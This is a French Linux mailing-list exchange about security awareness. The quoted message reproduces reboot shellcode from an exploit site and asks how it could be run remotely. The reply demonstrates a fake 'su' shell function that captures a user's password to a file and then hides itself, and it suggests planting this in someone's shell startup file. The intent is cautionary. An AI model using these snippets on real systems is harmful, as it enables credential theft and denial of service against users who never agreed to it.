On Fri, 28 Apr 2006 13:25:52 +0200
deny <[EMAIL PROTECTED]> wrote:

> Bonjour
> 
> Pour une fois ,je vais être un brin hs , mais on reste dans un cadre 
> linuxien
> 
> Voila , j'ai parcouru http://www.milw0rm.com/
> et à présent que je peux hacker la tarte aux fraises de ma grand-mère , 
> je me pose
> certaines questions existencielles :
> 
> voici un code qui permet de faire rebooter un pc linux
> (je l'ai testé ,il fonctionne ) parmi d'autres moins anodins
> 
> char shellcode[] = 
> 
>       "\x6a\x58"              // push $0x58 
>       "\x58"                  // pop %eax 
>       "\xbb\xad\xde\xe1\xfe"  // mov $0xfee1dead,%ebx 
>       "\xb9\x69\x19\x12\x28"  // mov $0x28121969,%ecx 
>       "\xba\x67\x45\x23\x01"  // mov $0x1234567,%edx 
>       "\xcd\x80";             // int $0x80 
> 
> int main(int argc, char **argv) {
>       int *ret;
>       ret = (int *)&ret + 2;
>       (*ret) = (int) shellcode;
> }
> 
> 
> 
> Le lancer en local n'a qu'un intérêt somme toute relatif (sauf à aimer faire 
> joujou avec son serveur X) 
> Donc pour en faire un remote exploit , il faut donc l'insérer dans un 
> programme existant , ou 
> bien le faire executer d'une facon ou d'une autre par des utilisateurs ayant 
> les droits root
> (en user normal cela ne fonctionne pas)
> Et c'est d'ailleurs le cas pour les shellcodes que j'ai trouvé jusqu'ici 
> 
> C'est ici que je recherche de la doc à ce sujet , non pas pour l'utiliser 
> frauduleusement ,mais 
> avant tout pour comprendre et mieux me rendre compte de l'utilité de ne pas 
> télécharger depuis n'importe quelles sources 
> ou ne pas faire n'importe quoi en root .
> 
> merci 
> 
> 

il est très facile d'exécuter du code caché dans des commentaires d'un simple 
script shell. voire de
transformer des scripts d'initialisation style ~/.trucrc

imagine qu'on ait infecté le $HOME d'un copain à travers un de ses fichiers 
d'initialisation de shell pour 
transformer la commande su en vue de récupérer ses mots de passe ....


[EMAIL PROTECTED] ~]$ type su
su is hashed (/bin/su)
[EMAIL PROTECTED] ~]$ su () { read -s -p "Password: "; echo $REPLY>crack; echo; 
sleep 2; echo su: mot de passe incorrect.; unset -f su; } 
[EMAIL PROTECTED] ~]$ type su
su is a function
su () 
{ 
    read -s -p "Password: ";
    echo $REPLY >crack;
    echo;
    sleep 2;
    echo su: mot de passe incorrect.;
    unset -f su
}

# je n'ai pas hacké mon ~/.bashrc donc je crée la fonction su à la main :). 
elle va reproduire le fonctionnement de la vraie commande
# mais c'est une fonction.
 
[EMAIL PROTECTED] ~]$ su
Password: 
su: mot de passe incorrect.

# elle renvoie le message d'erreur habituel

[EMAIL PROTECTED] ~]$ cat crack
e64F_35KMn

# mais le mot de passe a été récupéré dans un fichier crack ( c'est pas mon mot 
de passe! :)))
# et la fonction a été effacée pour que la commande redevienne normale
 
[EMAIL PROTECTED] ~]$ type su
su is hashed (/bin/su)
[EMAIL PROTECTED] ~]$ 


moralité, même en simple utilisateur il ne faut pas faire n'importe quoi, ni 
accepter n'importe quel fichier via IRC ou MSN entre autres ...
et ne jamais permettre les transferts automatiques!

bye
jipe

=========================================
Vous souhaitez acquerir votre Pack ou des Services Mandriva?
Rendez-vous sur "http://store.mandriva.com";.
Rejoignez le club mandrake : http://www.mandrivaclub.com
=========================================

Répondre à